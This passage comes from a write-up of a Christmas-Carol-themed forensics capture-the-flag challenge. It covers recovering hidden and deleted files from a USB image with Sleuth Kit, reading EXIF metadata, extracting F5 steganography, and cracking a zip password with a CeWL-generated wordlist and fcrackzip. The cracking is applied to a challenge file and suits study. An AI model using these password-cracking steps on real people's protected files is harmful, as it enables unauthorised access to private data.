The second file on the USB drive is a document, LetterToJackFromChuck.doc. The contents of the document are the following:
Date: 25 December 2034
From: Jonathan Pease, CEO GVC
To: Charles Booth, CEO Dickensian Enterprises LTD
Subject: Merry Christmas, My Good Man
Chuck,
I am writing to wish you a most splendid holiday season, old chap. I trust you will enjoy all the trappings of the upcoming festivities: mince pies, roast pheasant, chestnut stuffing, plum pudding, &c.
Oh, and I’d be remiss if I failed to mention that Old Scratch has got his own at last. Yes, Scrooge, that despicable worm, won’t be giving us the bother any more. I can’t help but chuckle to think of all those exploits he piled up over the years being handed to each and every vendor so they can fix their wares. All’s well that ends well, I always say. Yet another reason to celebrate a most jovial Yuletide.
More importantly, please pass on my holiday tidings to Elisabeth and the children.
Tally-ho!
Your friend,
There’s an image at the top showing the company of Jonathan Pease as Generic Victorian Company and another image of his signature at the bottom. There is no secret to find in the text, but we can see that they are saying all Scrooge’s exploits he stockpiled will be handed out to vendors to patch their wares. Since nothing was found in the content of the doc, we can look at the EXIF data. I’ve removed the less interesting fields and kept the rest:
$ exiftool LetterFromJackToChuck.doc
File Name : LetterFromJackToChuck.doc
Author : Jonathan Pease
Template : Normal.dotm
Last Modified By : Jonathan Pease
Software : Microsoft Macintosh Word
Create Date : 2034:12:25 14:27:00
Modify Date : 2034:12:25 14:31:00
Manager : None. I run the company!
Company : Generic Victorian Company
Secret : USB Secret #1: Your demise is a source of mirth.
So we now have USB secret #1. We can also see that the ghost took Scrooge 20 years into the future based on the Create and Modify dates, which match the date in the body of the letter. The “Generic Victorian Company” also fits in with the Dickens theme.
Hidden Files
We only saw two files on the system, but it’s possible there are other files that are hidden. We can run the Sleuth Kit tool fls to look for any deleted or hidden files.
# fls -f ntfs -r hhusb.dd.bin
r/r 4-128-4: $AttrDef
r/r 8-128-2: $BadClus
r/r 8-128-1: $BadClus:$Bad
r/r 6-128-4: $Bitmap
r/r 7-128-1: $Boot
d/d 11-144-4: $Extend
+ r/r 25-144-2: $ObjId:$O
+ r/r 24-144-3: $Quota:$O
+ r/r 24-144-2: $Quota:$Q
+ r/r 26-144-2: $Reparse:$R
+ d/d 27-144-2: $RmMetadata
++ r/r 28-128-4: $Repair
++ r/r 28-128-2: $Repair:$Config
++ d/d 30-144-2: $Txf
++ d/d 29-144-2: $TxfLog
+++ r/r 31-128-2: $Tops
+++ r/r 31-128-4: $Tops:$T
r/r 2-128-1: $LogFile
r/r 0-128-1: $MFT
r/r 1-128-1: $MFTMirr
r/r 9-128-8: $Secure:$SDS
r/r 9-144-6: $Secure:$SDH
r/r 9-144-5: $Secure:$SII
r/r 10-128-1: $UpCase
r/r 3-128-3: $Volume
r/r 32-128-1: hh2014-chat.pcapng
r/r 32-128-5: hh2014-chat.pcapng:Bed_Curtains.zip
r/r 33-128-1: LetterFromJackToChuck.doc
-/r * 34-128-1: Tiny_Tom_Crutches_Final.jpg
d/d 256: $OrphanFiles
Most of the files start with a $ and are NTFS system files, but the output contains two interesting lines:
- r/r 32-128-5: hh2014-chat.pcapng:Bed_Curtains.zip
- -/r * 34-128-1: Tiny_Tom_Crutches_Final.jpg
The first file Bed_Curtains.zip is in an Alternate Data Stream in the hh2014-chat.pcapng file. The second file Tiny_Tom_Crutches_Final.jpg is a recently deleted file whose MFT record hasn’t been overwritten yet.
We can extract the files with another Sleuth Kit tool icat:
# icat -f ntfs hhusb.dd.bin 32-128-5 > Bed_Curtains.zip
# file Bed_Curtains.zip
Bed_Curtains.zip: Zip archive data, at least v2.0 to extract
# icat -f ntfs hhusb.dd.bin 34-128-1 > Tiny_Tom_Crutches_Final.jpg
# file Tiny_Tom_Crutches_Final.jpg
Tiny_Tom_Crutches_Final.jpg: JPEG image data, JFIF standard 1.00, comment: "JPEG Encoder Copyright 1998, James R. Weeks and BioElectroMech\261"
ZIP – USB Secret #3
We can try unzipping the file; however, it’s password protected:
# unzip Bed_Curtains.zip
Archive: Bed_Curtains.zip
[Bed_Curtains.zip] Bed_Curtains.png password:
We need to crack the password. The Ghost of Hacking Present gave a hint about wanting to show Scrooge something “CeWL.” CeWL is a custom wordlist generator. You can point CeWL at a website and it will create a wordlist file, so we can use CeWL against Scrooge’s website.
# ruby cewl.rb http://scrooge-and-marley.com/ > scrooge-wordlist.txt
# wc scrooge-wordlist.txt
4243 4243 18969 scrooge-wordlist.txt
Now that we have a wordlist, we can use fcrackzip to try the passwords in the wordlist against the zip file:
# fcrackzip -v -D -u -p scrooge-wordlist.txt Bed_Curtains.zip
found file 'Bed_Curtains.png', (size cp/uc 1429113/1434946, flags 9, chk 4d1a)
PASSWORD FOUND!!!!: pw == shambolic
# unzip Bed_Curtains.zip
Archive: Bed_Curtains.zip
[Bed_Curtains.zip] Bed_Curtains.png password:
inflating: Bed_Curtains.png
The successful password was used by ELIZA in the first challenge as mentioned earlier and CeWL found it in a comment in the source code of Scrooge’s site as follows:
/* shambolic CSS, natch */
The PNG image looks like the following:
The image is a page from A Christmas Carol of a scene where a woman is describing how she took the bed curtains and blankets from the dead body of Scrooge. No secrets are in the image, but we can look at the EXIF data and obtain the secret, another one talking about Scrooge’s demise, and again with a date in the future.
$ exiftool Bed_Curtains.png
File Name : Bed_Curtains.png
Comment : USB Secret #3: Your demise is a source of gain for others.
Modify Date : 2034:12:25 13:30:00
JPG – USB Secret #4
The deleted JPG image is the following:
Looking around the image, there are no hidden secrets and nothing in the EXIF data. Since we have an image, we can try running stegdetect to look for any steganography, which would allow hiding data inside an image.
# stegdetect Tiny_Tom_Crutches_Final.jpg
Tiny_Tom_Crutches_Final.jpg : f5(***)
Stegdetect tells us f5, which we can combine with the other comment from the PCAP giving us a URL to https://code.google.com/p/f5-steganography/. F5 is a Java steganograhpy tool.
# java -jar f5.jar x -e Tiny.txt Tiny_Tom_Crutches_Final.jpg
Huffman decoding starts
Permutation starts
423168 indices shuffled
Extraction starts
Length of embedded file: 116 bytes
(1, 127, 7) code used
# ls -l Tiny.txt
-rw-rw-r-- 1 sieve sieve 116 Jan 4 19:51 Tiny.txt
# cat Tiny.txt
Tiny Tom has died.
USB Secret #4: You can prevent much grief and cause much joy. Hack for good, not evil or greed.
This gives us the final USB secret #4, and we’re done with the challenge. And just like in A Christmas Carol, Scrooge in our story is surely shaken by the news of Tiny Tom’s death.
Back to top
Stave 5
The spirits were successful and Scrooge has changed his ways. He finds a boy on the street to buy a furnace and deliver it to his Secret Room for Tom and Lynn. Scrooge visits his nephew for Christmas dinner and they make hacking plans for good. Also, Tiny Tom does not die, which I’m sure Tom Hessman is happy about!
Back to top